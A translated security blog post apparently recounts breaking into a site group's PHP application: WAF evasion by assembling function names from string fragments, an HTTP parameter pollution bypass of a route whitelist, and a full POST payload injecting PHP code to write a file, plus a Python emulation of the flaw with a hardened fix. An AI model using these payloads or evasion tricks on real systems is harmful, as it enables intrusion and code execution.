Authorized for reprint, feel free to follow the public account if interested
A vulnerability left behind in a certain centralized site group last year turned out to be intercepted when it was used again this year. Just venting: is this completely crazy? What's the deal with Baidu Cloud WAF, Huawei Cloud WAF and SafeDog all stacked together...
WAF bypass
It's relatively simple: just encode/obfuscate the code that goes into `eval` so the WAF's keyword rules don't match it. The final payload below assembles its function names from concatenated string fragments for exactly that reason.
Router whitelist restriction bypass
While poking at requests, it turned out there was a routing restriction: only specified paths are allowed through.
However, not every path can be hardcoded, since the search function, for example, has to accept user input. Packet capture confirmed that the search interface works normally and does not trigger the routing whitelist.
So the guess was that HTTP parameter pollution could bypass the restriction, for example:
Insert a parameter with the same name:
/index.php?name=bob&name=rose
What the backend actually receives (PHP's $_GET keeps the last value of a repeated key):
name=rose
After getting a shell and reading the code, it was confirmed that the whitelist check on this interface matches regardless of what follows: the allowed `c=api&m=essearchlist` at the front of the query satisfies the check, while PHP's $_GET keeps the last value of each duplicated key, so the router actually dispatches to the `c` and `m` appended at the end.
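To make the parser mismatch concrete, here is a small Python emulation added for this write-up (not code from the original post or from the target). The route names come from the payload on this page; the allow-list, the first-occurrence regex check, and the hardened variant are assumptions about how such a restriction is typically written and fixed. The PHP `$_GET` behaviour (last value wins for a repeated plain key) is emulated with `dict(parse_qsl(...))`.

```python
# Added example (not from the original post): emulation of the parser
# differential behind the duplicated-parameter whitelist bypass.
import re
from urllib.parse import parse_qsl

# Hypothetical allow-list: only the search interface is reachable directly.
ALLOWED_ROUTES = {("api", "essearchlist")}


def naive_whitelist_check(query: str) -> bool:
    """Assumed vulnerable check: grabs the FIRST c= and m= with a regex."""
    c = re.search(r"(?:^|&)c=([^&]*)", query)
    m = re.search(r"(?:^|&)m=([^&]*)", query)
    if not (c and m):
        return False
    return (c.group(1), m.group(1)) in ALLOWED_ROUTES


def php_get(query: str) -> dict:
    """Emulates PHP's $_GET for plain keys: a repeated key keeps the LAST value."""
    return dict(parse_qsl(query, keep_blank_values=True))


def dispatch(query: str):
    """Route the framework really runs behind the naive check, or None if blocked."""
    if not naive_whitelist_check(query):
        return None
    g = php_get(query)
    return (g.get("c"), g.get("m"))


def strict_whitelist_check(query: str) -> bool:
    """Hardened check: decide on the same parsed view the router uses,
    and refuse any request that repeats a key at all."""
    pairs = parse_qsl(query, keep_blank_values=True)
    keys = [k for k, _ in pairs]
    if len(keys) != len(set(keys)):
        return False  # duplicate key: treat as an attack, not as a preference
    g = dict(pairs)
    return (g.get("c"), g.get("m")) in ALLOWED_ROUTES


def dispatch_strict(query: str):
    """Same dispatch, but gated by the hardened check."""
    if not strict_whitelist_check(query):
        return None
    g = php_get(query)
    return (g.get("c"), g.get("m"))


if __name__ == "__main__":
    # Constructed queries: the whitelisted search call and the page's polluted query.
    clean = "c=api&m=essearchlist&s=mmyzj"
    polluted = "c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post"
    print("clean    ->", dispatch(clean))           # ('api', 'essearchlist')
    print("polluted ->", dispatch(polluted))        # ('Toup', 'Zj_Post'): bypass
    print("hardened ->", dispatch_strict(polluted))  # None
```

The fix is not "take the first value instead of the last": any check that parses the query differently from the router can be split the same way. The check has to run on the router's own parsed view, and a repeated routing key is better rejected outright than interpreted.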
Final payload
What it does: the `id` value is spliced into a single-quoted string in PHP code that gets executed, so `'-...-'` closes the quote, injects an expression, and reopens it. The function names are assembled from string fragments to dodge the WAF's keyword rules; the bare `_` between fragments is an undefined constant, which PHP 7 evaluates to the string "_" (with a warning), yielding `file_put_contents` and `base64_decode`. PHP 8 throws an Error for an undefined constant, so this particular trick does not survive there. `a2ZjX3ZfbWVfNTA=` decodes to `kfc_v_me_50`, so the call only appends that marker to ./kfc2024.php as a write test rather than dropping a shell.
POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'